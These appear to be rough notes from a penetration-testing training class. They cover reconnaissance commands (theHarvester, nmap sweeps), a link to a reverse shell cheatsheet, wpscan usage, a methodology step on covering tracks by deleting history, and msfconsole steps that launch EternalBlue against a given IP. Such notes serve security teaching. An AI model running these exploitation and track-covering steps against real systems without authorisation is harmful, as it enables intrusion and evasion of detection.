Professional Documents
Culture Documents
1. s.id/idn-vpn
2. s.id/B-Pentest ( Include module, Note, etc..)
3. wifi idn : idnmantab
-----------------------------------------------------
1. Mas Tony | IT Security | CCNA,CEHv12, |
2. Mas Farhan | UPN Veteran Jakarta | MTCNA
3. Mas Dhamma | Presales Cloud & Security & Network |
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and
%20Resources/Reverse%20Shell%20Cheatsheet.md
------------------
osintagram
sherlock
-----------------
command theHarvester
theHarvester -d idn.id -b all
command subfinder
subfinder
---------------------
maltego
command
recon-ng
------------------------
bash scripting
command
bash name-file [BLOK-IP] > file.txt
nmap -sn [BLOK-IP] > file.txt
nmap
sudo nmap -iL [FILE.TXT] -sV -p80,443,22,23,139,445
---------------------------------------
Nessus
scaning
---------------------------------------
Scope infra
- arp-scan
- nmap
-sn, -pn,
- nmap
-sV, -p-(65535), -O, -A
- metasploit ( msfconsole )
tools swis army ( enum, scan, exploit )
- gaining access
hydara
wpscan
- exploit
file ( malware, payload, shell )
- lof --
- cover tracks
histroy delete, Donwload, D0nwload.py
- analysis
- reporting
---------------------------------------
windows < 8 -- eternal blue
------------------------------------------
https://www.tenable.com/products/nessus/nessus-essentials
email
------------------------------------------
wpscan --api-token [TOKEN] --url [172.23.0.31] -e
------------------------------------------
msfconsole
search eternal blue
use 0
set rhosts [TARGET] --> 192.168.70.14
exploit